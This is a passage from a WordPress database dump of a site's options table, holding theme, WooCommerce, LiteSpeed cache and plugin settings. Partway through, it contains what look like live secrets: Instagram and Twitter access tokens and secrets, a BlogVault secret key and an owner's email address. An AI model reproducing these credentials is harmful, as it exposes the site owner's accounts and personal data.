"\";s:24:\"cf7_style_2_border_width\";s:0:\"\";s:25:\"cf7_style_2_border_radius\";s:0:\"\";s:23:\"cf7_style_2_padding_top\";s:0:\"\";s:25:\"cf7_style_2_padding_right\";s:0:\"\";s:26:\"cf7_style_2_padding_bottom\";s:0:\"\";s:24:\"cf7_style_2_padding_left\";s:0:\"\";s:22:\"cf7_style_2_margin_top\";s:0:\"\";s:25:\"cf7_style_2_margin_bottom\";s:0:\"\";s:27:\"cf7_style_2_textarea_height\";s:3:\"212\";s:24:\"cf7_style_2_button_color\";s:0:\"\";s:30:\"cf7_style_2_button_hover_color\";s:0:\"\";s:28:\"cf7_style_2_button_font_size\";s:0:\"\";s:31:\"cf7_style_2_button_google_fonts\";s:2:\"-1\";s:29:\"cf7_style_2_button_font_style\";s:0:\"\";s:30:\"cf7_style_2_button_font_weight\";s:0:\"\";s:33:\"cf7_style_2_button_text_transform\";s:0:\"\";s:33:\"cf7_style_2_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_2_button_background_color\";s:0:\"\";s:42:\"cf7_style_2_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_2_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_2_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_2_button_border_color\";s:0:\"\";s:38:\"cf7_style_2_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_2_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_2_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_2_button_border_width\";s:0:\"\";s:32:\"cf7_style_2_button_border_radius\";s:0:\"\";s:25:\"cf7_style_2_button_height\";s:0:\"\";s:26:\"cf7_style_2_button_padding\";s:0:\"\";s:22:\"cf7_style_3_text_color\";s:0:\"\";s:28:\"cf7_style_3_focus_text_color\";s:0:\"\";s:26:\"cf7_style_3_text_font_size\";s:0:\"\";s:28:\"cf7_style_3_text_line_height\";s:0:\"\";s:29:\"cf7_style_3_text_google_fonts\";s:2:\"-1\";s:27:\"cf7_style_3_text_font_style\";s:0:\"\";s:28:\"cf7_style_3_text_font_weight\";s:0:\"\";s:31:\"cf7_style_3_text_text_transform\";s:0:\"\";s:31:\"cf7_style_3_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_3_label_color\";s:0:\"\";s:27:\"cf7_style_3_label_font_size\";s:0:\"\";s:29:\"cf7_style_3_label_line_height\";s:0:\"\";s:30:\"cf7_style_3_label_google_fonts\";s:2:\"-1\";s:28:\"cf7_style_3_label_font_style\";s:0:\"\";s:29:\"cf7_style_3_label_font_weight\";s:0:\"\";s:32:\"cf7_style_3_label_text_transform\";s:0:\"\";s:32:\"cf7_style_3_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_3_background_color\";s:0:\"\";s:35:\"cf7_style_3_background_transparency\";s:0:\"\";s:34:\"cf7_style_3_focus_background_color\";s:0:\"\";s:41:\"cf7_style_3_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_3_border_color\";s:0:\"\";s:31:\"cf7_style_3_border_transparency\";s:0:\"\";s:30:\"cf7_style_3_focus_border_color\";s:0:\"\";s:37:\"cf7_style_3_focus_border_transparency\";s:0:\"\";s:24:\"cf7_style_3_border_width\";s:0:\"\";s:25:\"cf7_style_3_border_radius\";s:0:\"\";s:23:\"cf7_style_3_padding_top\";s:0:\"\";s:25:\"cf7_style_3_padding_right\";s:0:\"\";s:26:\"cf7_style_3_padding_bottom\";s:0:\"\";s:24:\"cf7_style_3_padding_left\";s:0:\"\";s:22:\"cf7_style_3_margin_top\";s:0:\"\";s:25:\"cf7_style_3_margin_bottom\";s:0:\"\";s:27:\"cf7_style_3_textarea_height\";s:0:\"\";s:24:\"cf7_style_3_button_color\";s:0:\"\";s:30:\"cf7_style_3_button_hover_color\";s:0:\"\";s:28:\"cf7_style_3_button_font_size\";s:0:\"\";s:31:\"cf7_style_3_button_google_fonts\";s:2:\"-1\";s:29:\"cf7_style_3_button_font_style\";s:0:\"\";s:30:\"cf7_style_3_button_font_weight\";s:0:\"\";s:33:\"cf7_style_3_button_text_transform\";s:0:\"\";s:33:\"cf7_style_3_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_3_button_background_color\";s:0:\"\";s:42:\"cf7_style_3_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_3_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_3_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_3_button_border_color\";s:0:\"\";s:38:\"cf7_style_3_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_3_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_3_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_3_button_border_width\";s:0:\"\";s:32:\"cf7_style_3_button_border_radius\";s:0:\"\";s:25:\"cf7_style_3_button_height\";s:0:\"\";s:26:\"cf7_style_3_button_padding\";s:0:\"\";s:17:\"reset_to_defaults\";s:2:\"no\";s:30:\"enable_social_share_on_product\";s:3:\"yes\";s:30:\"qodef_woo_product_list_columns\";s:27:\"qodef-woocommerce-columns-3\";s:36:\"qodef_woo_product_list_columns_space\";s:6:\"normal\";s:27:\"qodef_woo_products_per_page\";s:0:\"\";s:29:\"qodef_products_list_title_tag\";s:2:\"h4\";s:19:\"show_title_area_woo\";s:0:\"\";s:30:\"qodef_single_product_title_tag\";s:2:\"h2\";s:26:\"woo_number_of_thumb_images\";s:1:\"3\";s:29:\"woo_set_thumb_images_position\";s:11:\"below-image\";s:36:\"woo_enable_single_product_zoom_image\";s:2:\"no\";s:30:\"woo_set_single_images_behavior\";s:12:\"pretty-photo\";s:34:\"qodef_woo_related_products_columns\";s:27:\"qodef-woocommerce-columns-4\";s:23:\"smooth_pt_spinner_color\";s:0:\"\";s:16:\"404_back_to_home\";s:6:\"Search\";s:16:\"404_button_style\";s:0:\"\";s:21:\"qodef_ajax_save_nonce\";s:10:\"32bc44d14e\";s:16:\"_wp_http_referer\";s:69:\"/wp-admin/admin.php?page=succulents_qodef_theme_menu_tab_sidebar_page\";s:23:\"woocommerce-login-nonce\";N;s:8:\"_wpnonce\";N;s:32:\"woocommerce-reset-password-nonce\";N;s:27:\"qodef_twitter_connect_nonce\";s:10:\"fdb4c40c38\";}','yes'),(362,'wpb_js_composer_license_activation_notified','yes','yes'),(363,'woocommerce_meta_box_errors','a:0:{}','yes'),(531,'portfolio-category_children','a:1:{i:39;a:4:{i:0;i:41;i:1;i:51;i:2;i:52;i:3;i:53;}}','yes'),(532,'team-category_children','a:0:{}','yes'),(533,'testimonials-category_children','a:0:{}','yes'),(534,'product_cat_children','a:0:{}','yes'),(535,'events_category_children','a:0:{}','yes'),(538,'qodef_sidebars','a:3:{i:0;s:4:\"Team\";i:1;s:12:\"Shop Sidebar\";i:2;s:6:\"Home 6\";}','yes'),(539,'rs_image_meta_todo','a:0:{}','yes'),(850,'revslider_update_revision_current','6.6.0','yes'),(1227,'wpematico_db_version','2.5.2','no'),(1229,'WPeMatico_Options','a:61:{s:10:\"mailmethod\";s:4:\"mail\";s:12:\"mailsndemail\";s:0:\"\";s:11:\"mailsndname\";s:0:\"\";s:12:\"mailsendmail\";s:0:\"\";s:10:\"mailsecure\";s:0:\"\";s:8:\"mailhost\";s:0:\"\";s:8:\"mailport\";s:0:\"\";s:8:\"mailuser\";s:0:\"\";s:8:\"mailpass\";s:0:\"\";s:16:\"disabledashboard\";b:0;s:12:\"roles_widget\";a:1:{s:13:\"administrator\";s:13:\"administrator\";}s:11:\"dontruncron\";b:0;s:24:\"enable_alternate_wp_cron\";b:0;s:13:\"disablewpcron\";b:0;s:13:\"set_cron_code\";b:0;s:9:\"cron_code\";s:0:\"\";s:15:\"logexternalcron\";b:0;s:15:\"disable_credits\";b:1;s:17:\"disablecheckfeeds\";b:0;s:13:\"enabledelhash\";b:0;s:12:\"enableseelog\";b:0;s:13:\"enablerewrite\";b:0;s:15:\"enableword2cats\";b:0;s:12:\"customupload\";b:0;s:9:\"imgattach\";b:0;s:8:\"imgcache\";b:0;s:13:\"gralnolinkimg\";b:0;s:12:\"image_srcset\";b:0;s:12:\"audio_attach\";b:0;s:11:\"audio_cache\";b:0;s:16:\"gralnolink_audio\";b:0;s:19:\"customupload_audios\";b:0;s:12:\"video_attach\";b:0;s:11:\"video_cache\";b:0;s:16:\"gralnolink_video\";b:0;s:19:\"customupload_videos\";b:0;s:11:\"featuredimg\";b:0;s:13:\"rmfeaturedimg\";b:0;s:17:\"force_mysimplepie\";b:0;s:17:\"set_stupidly_fast\";b:1;s:24:\"simplepie_strip_htmltags\";b:0;s:26:\"simplepie_strip_attributes\";b:0;s:14:\"strip_htmltags\";s:0:\"\";s:14:\"strip_htmlattr\";s:0:\"\";s:10:\"woutfilter\";b:0;s:16:\"campaign_timeout\";i:300;s:8:\"throttle\";i:0;s:15:\"allowduplicates\";b:0;s:13:\"allowduptitle\";b:0;s:12:\"allowduphash\";b:0;s:14:\"jumpduplicates\";b:0;s:10:\"disableccf\";b:0;s:38:\"add_extra_duplicate_filter_meta_source\";b:0;s:9:\"nonstatic\";b:0;s:16:\"emptytrashbutton\";b:0;s:15:\"cpt_trashbutton\";a:2:{s:4:\"post\";i:1;s:4:\"page\";i:1;}s:33:\"disable_metaboxes_wpematico_posts\";b:0;s:30:\"disable_categories_description\";b:0;s:17:\"enable_xml_upload\";b:0;s:18:\"entity_decode_html\";b:0;s:28:\"disable_extensions_feed_page\";b:0;}','yes'),(1244,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(1343,'wpem_menu_position','','yes'),(1344,'wpem_show_locally_addons','','yes'),(1345,'wpem_hide_reviews','','yes'),(1880,'qodef_instagram_code_redirect_uri','http://demo.select-themes.com/instagram-app/instagram-redirect.php?redirect_uri=http%3A%2F%2Ftummyrevolution.com%2Fwp-admin%2Fadmin.php%3Fpage%3Dsucculents_qodef_theme_menu_tab_social_page','yes'),(1882,'qodef_instagram_code','e0fa618170054d2392ffa5d84719218d','yes'),(1883,'qodef_instagram_access_token','1827818396.d088521.27afa4d63b1e403d819cba85cf84516c','yes'),(1884,'qodef_instagram_user_id','1827818396','yes'),(1885,'qodef_twitter_request_token','v-DhPwAAAAAAgE_9AAABcW5Z9E0','yes'),(1886,'qodef_twitter_request_token_secret','RIhniAsP73j0rPjNnogt4d7MXoOmZpIK','yes'),(3419,'qodef_twitter_authorize_token','v-DhPwAAAAAAgE_9AAABcW5Z9E0','yes'),(3420,'qodef_twitter_authorize_verifier','rT3XzZ9xvZB5duVMDO1WuVxd6GHo14UE','yes'),(3421,'qodef_twitter_access_token','3154711972-S7hceX8UMY3bauroQqHZ4K52i04o6a1TRbJBDWS','yes'),(3422,'qodef_twitter_access_token_secret','kqgNr8UY4JUJ3sdY4xwQQtB1iHuLBUL5hyr6pD2oA86hC','yes'),(3423,'qodef_twitter_user_id','3154711972','yes'),(3424,'qodef_twitter_screen_name','tummyrevolution','yes'),(3872,'woocommerce_maybe_regenerate_images_hash','991b1ca641921cf0f5baf7a2fe85861b','yes'),(7346,'category_children','a:1:{i:94;a:2:{i:0;i:93;i:1;i:96;}}','yes'),(8587,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:20:\"sara.chadwick@me.com\";s:7:\"version\";s:5:\"6.4.2\";s:9:\"timestamp\";i:1704137626;}','no'),(8942,'bvmgredirect','no','no'),(8943,'bvActivateTime','1588663238','no'),(320178,'litespeed.admin_display.msg_pin','-1','yes'),(8947,'bvSecretKey','CdmjgtmmCOoInnTMjR4RwzMFCG7RLgEK','no'),(8948,'bvAccountsList','a:1:{s:32:\"494aabc96fa9ca5a98dedc6c179c7c25\";a:5:{s:6:\"secret\";s:32:\"43c8fd5906c6cb4bc884320e5f40b389\";s:14:\"lastbackuptime\";i:1588667414;s:11:\"migrateguru\";b:1;s:3:\"url\";s:26:\"http://tummyrevolution.com\";s:5:\"email\";s:20:\"sdaq******@gmail.com\";}}','no'),(8958,'bvLastRecvTime','1588667444','no'),(8959,'bvApiPublic','494aabc96fa9ca5a98dedc6c179c7c25','no'),(8972,'_transient_woocommerce_webhook_ids_status_active','a:0:{}','yes'),(115923,'woocommerce_force_ssl_checkout','no','yes'),(10768,'_transient_product_query-transient-version','1692709968','yes'),(9392,'akismet_spam_count','10284','yes'),(12252,'_transient_shipping-transient-version','1589886229','yes'),(19884,'_transient_product-transient-version','1691836224','yes'),(19885,'_transient_orders-transient-version','1592537723','yes'),(70353,'litespeed.cloud._summary','{\"curr_request.wp\\/ver\":0,\"last_request.wp\\/ver\":1692873755,\"news.utime\":1692684427,\"curr_request.wp\\/news\":0,\"last_request.wp\\/news\":1692684427,\"curr_request.ver\":0,\"last_request.ver\":1697247920}','yes'),(332165,'litespeed.conf._version','5.7','yes'),(70355,'litespeed.conf.hash','eiysVMtgLLmT0QNfNVeK6rs2UBao8OdW','yes'),(70356,'litespeed.conf.auto_upgrade','','yes'),(70357,'litespeed.conf.api_key','','yes'),(70358,'litespeed.conf.server_ip','','yes'),(70359,'litespeed.conf.news','1','yes'),(70360,'litespeed.conf.cache','1','yes'),(70361,'litespeed.conf.cache-priv','1','yes'),(70362,'litespeed.conf.cache-commenter','1','yes'),(70363,'litespeed.conf.cache-rest','1','yes'),(70364,'litespeed.conf.cache-page_login','1','yes'),(70365,'litespeed.conf.cache-favicon','1','yes'),(70366,'litespeed.conf.cache-resources','1','yes'),(70367,'litespeed.conf.cache-mobile','','yes'),(70368,'litespeed.conf.cache-mobile_rules','a:7:{i:0;s:6:\"Mobile\";i:1;s:7:\"Android\";i:2;s:5:\"Silk/\";i:3;s:6:\"Kindle\";i:4;s:10:\"BlackBerry\";i:5;s:10:\"Opera Mini\";i:6;s:10:\"Opera Mobi\";}','yes'),(70369,'litespeed.conf.cache-browser','','yes'),(70370,'litespeed.conf.cache-exc_useragents','a:0:{}','yes'),(70371,'litespeed.conf.cache-exc_cookies','a:0:{}','yes'),(70372,'litespeed.conf.cache-exc_qs','a:0:{}','yes'),(70373,'litespeed.conf.cache-exc_cat','a:0:{}','yes'),(70374,'litespeed.conf.cache-exc_tag','a:0:{}','yes'),(70375,'litespeed.conf.cache-force_uri','a:0:{}','yes'),(70376,'litespeed.conf.cache-force_pub_uri','a:0:{}','yes'),(70377,'litespeed.conf.cache-priv_uri','a:0:{}','yes'),(70378,'litespeed.conf.cache-exc','a:0:{}','yes'),(70379,'litespeed.conf.cache-exc_roles','a:0:{}','yes'),(70380,'litespeed.conf.cache-drop_qs','a:4:{i:0;s:6:\"fbclid\";i:1;s:5:\"gclid\";i:2;s:4:\"utm*\";i:3;s:3:\"_ga\";}','yes'),(70381,'litespeed.conf.cache-ttl_pub','604800','yes'),(70382,'litespeed.conf.cache-ttl_priv','1800','yes'),(70383,'litespeed.conf.cache-ttl_frontpage','604800','yes'),(70384,'litespeed.conf.cache-ttl_feed','604800','yes'),(70385,'litespeed.conf.cache-ttl_rest','604800','yes'),(70386,'litespeed.conf.cache-ttl_browser','31557600','yes'),(70387,'litespeed.conf.cache-ttl_status','a:3:{i:0;s:8:\"403 3600\";i:1;s:8:\"404 3600\";i:2;s:8:\"500 3600\";}','yes'),(70388,'litespeed.conf.cache-login_cookie','','yes'),(70389,'litespeed.conf.cache-vary_group','a:0:{}','yes'),(70390,'litespeed.conf.purge-upgrade','1','yes'),(70391,'litespeed.conf.purge-stale','','yes'),(70392,'litespeed.conf.purge-post_all','','yes'),(70393,'litespeed.conf.purge-post_f','1','yes'),(70394,'litespeed.conf.purge-post_h','1','yes'),(70395,'litespeed.conf.purge-post_p','1','yes'),(70396,'litespeed.conf.purge-post_pwrp','1','yes'),(70397,'litespeed.conf.purge-post_a','1','yes'),(70398,'litespeed.conf.purge-post_y','','yes'),(70399,'litespeed.conf.purge-post_m','1','yes'),(70400,'litespeed.conf.purge-post_d','','yes'),(70401,'litespeed.conf.purge-post_t','1','yes'),(70402,'litespeed.conf.purge-post_pt','1','yes'),(70403,'litespeed.conf.purge-timed_urls','a:0:{}','yes'),(70404,'litespeed.conf.purge-timed_urls_time','','yes'),(70405,'litespeed.conf.purge-hook_all','a:10:{i:0;s:12:\"switch_theme\";i:1;s:18:\"wp_create_nav_menu\";i:2;s:18:\"wp_update_nav_menu\";i:3;s:18:\"wp_delete_nav_menu\";i:4;s:11:\"create_term\";i:5;s:10:\"edit_terms\";i:6;s:11:\"delete_term\";i:7;s:8:\"add_link\";i:8;s:9:\"edit_link\";i:9;s:11:\"delete_link\";}','yes'),(70535,'litespeed.conf.cdn-ori_dir','a:2:{i:0;s:10:\"wp-content\";i:1;s:11:\"wp-includes\";}','yes'),(70536,'litespeed.conf.cdn-exc','a:0:{}','yes'),(70537,'litespeed.conf.cdn-remote_jq','','yes'),(70538,'litespeed.conf.cdn-quic','','yes'),(70539,'litespeed.conf.cdn-cloudflare','','yes'),(70540,'litespeed.conf.cdn-cloudflare_email','','yes'),(70541,'litespeed.conf.cdn-cloudflare_key','','yes'),(70542,'litespeed.conf.cdn-cloudflare_name','','yes'),(70543,'litespeed.conf.cdn-cloudflare_zone','','yes'),(70544,'litespeed.conf.cdn-mapping','a:1:{i:0;a:5:{s:3:\"url\";b:0;s:7:\"inc_img\";s:1:\"1\";s:7:\"inc_css\";s:1:\"1\";s:6:\"inc_js\";s:1:\"1\";s:8:\"filetype\";a:17:{i:0;s:4:\".aac\";i:1;s:4:\".css\";i:2;s:4:\".eot\";i:3;s:4:\".gif\";i:4;s:5:\".jpeg\";i:5;s:3:\".js\";i:6;s:4:\".jpg\";i:7;s:5:\".less\";i:8;s:4:\".mp3\";i:9;s:4:\".mp4\";i:10;s:4:\".ogg\";i:11;s:4:\".otf\";i:12;s:4:\".pdf\";i:13;s:4:\".png\";i:14;s:4:\".svg\";i:15;s:4:\".ttf\";i:16;s:5:\".woff\";}}}','yes'),(70545,'litespeed.conf.cdn-attr','a:5:{i:0;s:4:\".src\";i:1;s:9:\".data-src\";i:2;s:5:\".href\";i:3;s:7:\".poster\";i:4;s:13:\"source.srcset\";}','yes'),(70584,'litespeed.optimize.timestamp_purge_css','1697247920','yes'),(70406,'litespeed.conf.esi','','yes'),(70407,'litespeed.conf.esi-cache_admbar','1','yes'),(70408,'litespeed.conf.esi-cache_commform','1','yes'),(70409,'litespeed.conf.esi-nonce','a:2:{i:0;s:11:\"stats_nonce\";i:1;s:15:\"subscribe_nonce\";}','yes'),(70410,'litespeed.conf.util-instant_click','','yes'),(70411,'litespeed.conf.util-no_https_vary','','yes'),(70412,'litespeed.conf.debug-disable_all','','yes'),(70413,'litespeed.conf.debug','','yes'),(70414,'litespeed.conf.debug-ips','a:1:{i:0;s:9:\"127.0.0.1\";}','yes'),(70415,'litespeed.conf.debug-level','','yes'),(70416,'litespeed.conf.debug-filesize','3','yes'),(70417,'litespeed.conf.debug-cookie','','yes'),(70418,'litespeed.conf.debug-collaps_qs','','yes'),(70419,'litespeed.conf.debug-inc','a:0:{}','yes'),(70420,'litespeed.conf.debug-exc','a:0:{}','yes'),(70421,'litespeed.conf.db_optm-revisions_max','0','yes'),(70422,'litespeed.conf.db_optm-revisions_age','0','yes'),(70423,'litespeed.conf.optm-css_min','','yes'),(70424,'litespeed.conf.optm-css_comb','','yes'),(70425,'litespeed.conf.optm-css_unique','','yes'),(70426,'litespeed.conf.optm-ucss','','yes'),(70427,'litespeed.conf.optm-ucss_async','','yes'),(70428,'litespeed.conf.optm-css_http2','','yes'),(70429,'litespeed.conf.optm-css_exc','a:0:{}','yes'),(70430,'litespeed.conf.optm-js_min','','yes'),(70431,'litespeed.conf.optm-js_comb','','yes'),(70432,'litespeed.conf.optm-js_comb_ext_inl','','yes'),(70433,'litespeed.conf.optm-js_http2','','yes'),(70434,'litespeed.conf.optm-js_exc','a:2:{i:0;s:9:\"jquery.js\";i:1;s:13:\"jquery.min.js\";}','yes'),(70435,'litespeed.conf.optm-ttl','604800','yes'),(70436,'litespeed.conf.optm-html_min','','yes'),(70437,'litespeed.conf.optm-qs_rm','','yes'),(70438,'litespeed.conf.optm-ggfonts_rm','','yes'),(70439,'litespeed.conf.optm-css_async','','yes'),(70440,'litespeed.conf.optm-ccss_gen','1','yes'),(70441,'litespeed.conf.optm-ccss_async','1','yes'),(70442,'litespeed.conf.optm-css_async_inline','1','yes'),(70443,'litespeed.conf.optm-css_font_display','','yes'),(70444,'litespeed.conf.optm-js_defer','','yes'),(70445,'litespeed.conf.optm-js_inline_defer','','yes'),(70446,'litespeed.conf.optm-emoji_rm','','yes'),(70447,'litespeed.conf.optm-noscript_rm','','yes'),(70448,'litespeed.conf.optm-ggfonts_async','','yes'),(70449,'litespeed.conf.optm-rm_comment','','yes'),(70450,'litespeed.conf.optm-exc_roles','a:0:{}','yes'),(70451,'litespeed.conf.optm-ccss_con','','yes'),(70452,'litespeed.conf.optm-js_defer_exc','a:2:{i:0;s:9:\"jquery.js\";i:1;s:13:\"jquery.min.js\";}','yes'),(70453,'litespeed.conf.optm-dns_prefetch','a:0:{}','yes'),(70454,'litespeed.conf.optm-dns_prefetch_ctrl','','yes'),(70455,'litespeed.conf.optm-exc','a:0:{}','yes'),(70456,'litespeed.conf.optm-ccss_sep_posttype','a:0:{}','yes'),(70457,'litespeed.conf.optm-ccss_sep_uri','a:0:{}','yes'),(70458,'litespeed.conf.object','','yes'),(70459,'litespeed.conf.object-kind','','yes'),(70460,'litespeed.conf.object-host','localhost','yes'),(70461,'litespeed.conf.object-port','11211','yes'),(70462,'litespeed.conf.object-life','360','yes'),(70463,'litespeed.conf.object-persistent','1','yes'),(70464,'litespeed.conf.object-admin','1','yes'),(70465,'litespeed.conf.object-transients','1','yes'),(70466,'litespeed.conf.object-db_id','0','yes'),(70467,'litespeed.conf.object-user','','yes'),(70468,'litespeed.conf.object-pswd','','yes'),(70469,'litespeed.conf.object-global_groups','a:12:{i:0;s:5:\"users\";i:1;s:10:\"userlogins\";i:2;s:8:\"usermeta\";i:3;s:9:\"user_meta\";i:4;s:14:\"site-transient\";i:5;s:12:\"site-options\";i:6;s:11:\"site-lookup\";i:7;s:11:\"blog-lookup\";i:8;s:12:\"blog-details\";i:9;s:3:\"rss\";i:10;s:12:\"global-posts\";i:11;s:13:\"blog-id-cache\";}','yes'),(70470,'litespeed.conf.object-non_persistent_groups','a:4:{i:0;s:7:\"comment\";i:1;s:6:\"counts\";i:2;s:7:\"plugins\";i:3;s:13:\"wc_session_id\";}','yes'),(70471,'litespeed.conf.discuss-avatar_cache','','yes'),(70472,'litespeed.conf.discuss-avatar_cron','','yes'),(70473,'litespeed.conf.discuss-avatar_cache_ttl','604800','yes'),(70474,'litespeed.conf.optm-localize','','yes'),(70475,'litespeed.conf.optm-localize_domains','a:35:{i:0;s:13:\"### some CDNs\";i:1;s:26:\"https://ajax.aspnetcdn.com\";i:2;s:28:\"https://ajax.cloudflare.com/\";i:3;s:33:\"https://ajax.googleapis.com/ajax/\";i:4;s:25:\"https://cdn.jsdelivr.net/\";i:5;s:18:\"https://cdnjs.com/\";i:6;s:29:\"https://cdnjs.cloudflare.com/\";i:7;s:24:\"https://code.jquery.com/\";i:8;s:32:\"https://maxcdn.bootstrapcdn.com/\";i:9;s:32:\"https://netdna.bootstrapcdn.com/\";i:10;s:23:\"https://oss.maxcdn.com/\";i:11;s:35:\"https://stackpath.bootstrapcdn.com/\";i:12;s:23:\"### Popular scripts ###\";i:13;s:30:\"https://a.optmnstr.com/app/js/\";i:14;s:31:\"https://cdn.onesignal.com/sdks/\";i:15;s:27:\"https://cdn.optimizely.com/\";i:16;s:26:\"https://cdn.shopify.com/s/\";i:17;s:48:\"https://css3-mediaqueries-js.googlecode.com/svn/\";i:18;s:37:\"https://html5shim.googlecode.com/svn/\";i:19;s:37:\"https://html5shiv.googlecode.com/svn/\";i:20;s:35:\"https://maps.google.com/maps/api/js\";i:21;s:39:\"https://maps.googleapis.com/maps/api/js\";i:22;s:48:\"https://pagead2.googlesyndication.com/pagead/js/\";i:23;s:39:\"https://platform.twitter.com/widgets.js\";i:24;s:38:\"https://platform-api.sharethis.com/js/\";i:25;s:26:\"https://s7.addthis.com/js/\";i:26;s:21:\"https://stats.wp.com/\";i:27;s:32:\"https://ws.sharethis.com/button/\";i:28;s:39:\"https://www.google.com/recaptcha/api.js\";i:29;s:45:\"https://www.google-analytics.com/analytics.js\";i:30;s:40:\"https://www.googletagmanager.com/gtag/js\";i:31;s:39:\"https://www.googletagmanager.com/gtm.js\";i:32;s:47:\"https://www.googletagservices.com/tag/js/gpt.js\";i:33;s:46:\"https://connect.facebook.net/en_US/fbevents.js\";i:34;s:44:\"https://connect.facebook.net/signals/config/\";}','yes'),(70476,'litespeed.conf.media-lazy','','yes'),(70477,'litespeed.conf.media-lazy_placeholder','','yes'),(70478,'litespeed.conf.media-placeholder_resp','','yes'),(70479,'litespeed.conf.media-placeholder_resp_color','#cfd4db','yes'),(70480,'litespeed.conf.media-placeholder_resp_svg','','yes'),(70481,'litespeed.conf.media-lqip','','yes'),(70482,'litespeed.conf.media-lqip_qual','4','yes'),(70483,'litespeed.conf.media-lqip_min_w','150','yes'),(70484,'litespeed.conf.media-lqip_min_h','150','yes'),(70485,'litespeed.conf.media-placeholder_resp_async','1','yes'),(70486,'litespeed.conf.media-iframe_lazy','','yes'),(70487,'litespeed.conf.media-lazyjs_inline','','yes'),(70488,'litespeed.conf.media-lazy_exc','a:0:{}','yes'),(70489,'litespeed.conf.media-lazy_cls_exc','a:1:{i:0;s:15:\"wmu-preview-img\";}','yes'),(70490,'litespeed.conf.media-lazy_parent_cls_exc','a:0:{}','yes'),(70491,'litespeed.conf.media-iframe_lazy_cls_exc','a:0:{}','yes'),(70492,'litespeed.conf.media-iframe_lazy_parent_cls_exc','a:0:{}','yes'),(70493,'litespeed.conf.media-lazy_uri_exc','a:0:{}','yes'),(70494,'litespeed.conf.media-lqip_exc','a:0:{}','yes'),(70495,'litespeed.conf.img_optm-auto','','yes'),(70496,'litespeed.conf.img_optm-cron','1','yes'),(70497,'litespeed.conf.img_optm-ori','1','yes'),(70498,'litespeed.conf.img_optm-rm_bkup','','yes'),(70499,'litespeed.conf.img_optm-webp','','yes'),(70500,'litespeed.conf.img_optm-lossless','','yes'),(70501,'litespeed.conf.img_optm-exif','','yes'),(70502,'litespeed.conf.img_optm-webp_replace','','yes'),(70503,'litespeed.conf.img_optm-webp_attr','a:7:{i:0;s:7:\"img.src\";i:1;s:14:\"div.data-thumb\";i:2;s:12:\"img.data-src\";i:3;s:20:\"div.data-large_image\";i:4;s:19:\"img.retina_logo_url\";i:5;s:23:\"div.data-parallax-image\";i:6;s:12:\"video.poster\";}','yes'),(70504,'litespeed.conf.img_optm-webp_replace_srcset','','yes'),(70505,'litespeed.conf.img_optm-jpg_quality','82','yes'),(70506,'litespeed.conf.crawler','','yes'),(70507,'litespeed.conf.crawler-inc_posts','1','yes'),(70508,'litespeed.conf.crawler-inc_pages','1','yes'),(70509,'litespeed.conf.crawler-inc_cats','1','yes'),(70510,'litespeed.conf.crawler-inc_tags','1','yes'),(70511,'litespeed.conf.crawler-exc_cpt','a:0:{}','yes'),(70512,'litespeed.conf.crawler-order_links','','yes'),(70513,'litespeed.conf.crawler-usleep','500','yes'),(70514,'litespeed.conf.crawler-run_duration','400','yes'),(70515,'litespeed.conf.crawler-run_interval','600','yes'),(70516,'litespeed.conf.crawler-crawl_interval','302400','yes'),(70517,'litespeed.conf.crawler-threads','3','yes'),(70518,'litespeed.conf.crawler-timeout','30','yes'),(70519,'litespeed.conf.crawler-load_limit','1','yes'),(70520,'litespeed.conf.crawler-sitemap','','yes'),(70521,'litespeed.conf.crawler-drop_domain','1','yes'),(70522,'litespeed.conf.crawler-map_timeout','120','yes'),(70523,'litespeed.conf.crawler-roles','a:0:{}','yes'),(70524,'litespeed.conf.crawler-cookies','a:0:{}','yes'),(70525,'litespeed.conf.misc-htaccess_front','','yes'),(70526,'litespeed.conf.misc-htaccess_back','','yes'),(70527,'litespeed.conf.misc-heartbeat_front','','yes'),(70528,'litespeed.conf.misc-heartbeat_front_ttl','60','yes'),(70529,'litespeed.conf.misc-heartbeat_back','','yes'),(70530,'litespeed.conf.misc-heartbeat_back_ttl','60','yes'),(70531,'litespeed.conf.misc-heartbeat_editor','','yes'),(70532,'litespeed.conf.misc-heartbeat_editor_ttl','15','yes'),(70533,'litespeed.conf.cdn','','yes'),(70534,'litespeed.conf.cdn-ori','a:0:{}','yes'),(62526,'WPLANG','','yes'),(313182,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":7,\"critical\":1}','yes'),(320960,'sbi_newuser_notifications','a:4:{s:6:\"update\";i:1693473471;s:4:\"feed\";a:2:{s:6:\"review\";a:6:{s:5:\"title\";s:22:\"Could you help us out?\";s:7:\"content\";s:273:\"It\'s great to see that you\'ve been using the {plugin} plugin for a while now. Hopefully you\'re happy with it!  If so, would you consider leaving a positive review? It really helps to support the plugin and helps others to discover it too!\";s:2:\"id\";s:6:\"review\";s:5:\"image\";s:12:\"sbi-icon.png\";s:4:\"btns\";a:4:{s:7:\"primary\";a:4:{s:3:\"url\";s:12:\"{review-url}\";s:4:\"attr\";a:1:{i:0;s:11:\"targetblank\";}s:5:\"class\";s:31:\"sbi_notice_dismiss sbi_main_cta\";s:4:\"text\";s:18:\"Sure, I\'d love to!\";}s:7:\"dismiss\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:1:\"1\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:9:\"No 